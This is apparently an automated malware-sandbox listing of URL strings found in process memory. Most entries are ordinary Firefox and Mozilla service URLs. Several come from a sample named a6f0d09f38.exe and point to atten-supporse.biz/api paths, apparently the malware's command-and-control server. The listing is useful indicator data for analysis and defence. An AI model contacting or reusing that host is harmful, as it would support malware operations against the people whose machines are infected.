Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: a6f0d09f38.exe, 0000000D.00000002.2958708829.0000000001258000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573323312.00000000012B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/
Source: a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001258000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2958708829.0000000001258000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/L
Source: a6f0d09f38.exe, 0000000D.00000003.2681690134.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678528544.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2656607404.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/ac
Source: a6f0d09f38.exe, 0000000D.00000003.2700729601.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2681690134.00000000012CF000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782069671.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678594723.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782468344.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2656804081.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2656627484.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api
Source: a6f0d09f38.exe, 0000000D.00000003.2700729601.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2681690134.00000000012CF000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782069671.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678594723.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782468344.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api3Co
Source: a6f0d09f38.exe, 0000000D.00000003.2700729601.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782069671.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782468344.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2961232201.00000000012CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiPC
Source: a6f0d09f38.exe, 0000000D.00000003.2656627484.00000000012B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apibV7Ryd
Source: a6f0d09f38.exe, 0000000D.00000003.2781341437.0000000005B85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/api
Source: a6f0d09f38.exe, 0000000D.00000003.2678573432.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2781341437.0000000005B85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apiH
Source: a6f0d09f38.exe, 0000000D.00000003.2656994034.0000000005B86000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678573432.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2653867084.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2781341437.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2627978100.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apiZqY2EqXqknUgpH6oCFyW/SwlkltNsdwG0IiPX9UX11rVdhzlFCaipm6aO0i/7CII7Y
Source: a6f0d09f38.exe, 0000000D.00000003.2656994034.0000000005B86000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678573432.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2653867084.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2781341437.0000000005B85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apif0cK3T
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apiings
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2978589406.000001DEDEB6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 0000001C.00000003.2925812595.000001DEF10B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1189266
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180Stale
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1266220
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1283601
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=792480
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=840161
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2978589406.000001DEDEB30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933112137.000001DEF03A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2792631818.000001DEFA713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3049413497.000001DEEC2C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://datastudio.google.com/embed/reporting/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationschr
Source: firefox.exe, 0000001C.00000003.2933112137.000001DEF03B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2779540484.000001DEF03BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933815847.000001DEF0379000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755426525.000001DEF693A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E812000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000003.2760314917.000001DEEFF91000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2761194812.000001DEEFF92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
